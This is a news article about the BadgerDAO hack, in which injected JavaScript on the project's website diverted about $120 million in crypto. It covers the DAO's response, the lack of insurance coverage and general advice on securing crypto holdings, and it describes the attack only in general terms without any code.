BadgerDAO was a fairly low-key crypto project, quietly working to serve growing markets for investment products in the decentralized finance space. But last week it was rocketed into the limelight for one of the worst reasons possible — its website was hacked and thieves stole $120 million in crypto assets.
The incident showed how risky and vulnerable digital tokens can be, even though blockchain technology is purportedly highly secure. Because the incident involving BadgerDAO was a “front-end” attack,” its insurance policy from Nexus Mutual also doesn’t cover losses from the attack. While BadgerDAO took appropriate steps to contain the damage, hired a data forensics firm and looped in law enforcement, it’s unclear whether the victims will ever see their money.
In a last-ditch attempt to negotiate with the hackers, BadgerDAO also appealed to their sense of decency and asked for their assistance. The affected assets involved wrapped bitcoin, a version of bitcoin that exists on Ethereum’s blockchain.
“You have taken funds that do not belong to you but we are willing to work with you and compensate you for identifying this vulnerability in the systems,” the crypto collective said in a public post on its site. “We are providing you with a direct line of communication to discuss a peaceful resolution without involving any outside parties.” The DAO also implored its members to “be patient.”
We also don't know what the collective (a DAO is a decentralized autonomous organization, formed via blockchain and lacking a centralized leadership structure), could have done to prevent or mitigate the attack.
In a post mortem report released yesterday, the group explained that the hack appeared to have stemmed from someone malicious JavaScript into the BadgerDAO’s website interface. The script, which may have been active on-and-off since Nov. 10, could intercept transactions and move the tokens of the victim to the attacker. It was run at random intervals to avoid becoming detected, so the attack went unnoticed for some time.
Another main issue appears to have involved access to CloudFlare through an API key that should have been protected by multi-factor authentication. While multi-factor authentication is becoming a more common security feature in many organizations, there are challenges with implementation and lack of awareness that make it less effective than it could be.
In the event of a hack, the first thing an affected entity should do is to freeze the account. Once it became aware of the problem, BadgerDAO did this, pausing all smart contracts and recommending that all users immediately stop sending any transactions to the malicious addresses. But as we said, the attack may have been going on for a month before it was detected, so freezing the platform couldn’t undo the damage that has already been done.
The primary issue is that even with these steps taken and an investigation underway, there is little substantive redress for victims of crypto hacks. Experts recognize that the best way around it is to avoid opportunities to be hacked in the first place. To that end, there are several ways to secure your crypto to avoid theft.
Many well-known platforms to buy crypto are considered to be secure. Platforms like Kraken, for example, have a reputation for particularly high security (though Kraken is also considered to be less intuitive to use for beginners). But when it comes down to it, the only truly secure place to keep crypto funds is offline. Cold wallets exist for this purpose, hardware devices that store cryptocurrency without an internet connection.
Crypto security experts recommend never keeping currency holdings on exchanges for longer than necessary. For one thing, this is because cryptocurrency exchanges operate in a sort of IOU setup (not unlike a savings account at a traditional bank). That is, there isn’t physical currency available for you, but rather the intent to pay it.
This means if an exchange goes under (which has happened), that money is not guaranteed to you. And unlike some institutions, the Fed is not going to bail out a failed crypto exchange. Of course, the other reason to store currency offline is because, as we have recently seen, hacks are not uncommon.
The question then becomes, how can we prevent similar incidents in the future? Unfortunately, the answer is not clean-cut. Part of the challenge stems from the fact that it is usually not blockchain technology itself that is to blame, but the layers on top of it. Crypto exchanges holding the currency are susceptible to hacks through a number of channels even if the blocks themselves are immutable.
Unfortunately, in order for cryptocurrency to have the same financial security as fiat currencies, there will likely need to be greater regulation. This may be counter to the original intent of DeFi, but law enforcement resources and government oversight are in part of what make traditional bank accounts a much less risky investment.
Many world governments are now looking to digital fiat currencies — an interesting blend of crypto and traditional. But for the time being, it appears the volatility of the crypto market is not the only risk traders take when deciding to invest.
The investigation is ongoing, and BadgerDAO appears to be making concerted efforts to communicate their progress to community members. But the fact still stands that there is limited recourse for such attacks, and cryptocurrency is never a sure thing when it comes to financial security. In the meantime, crypto users should learn from this and be vigilant with their individual security measures.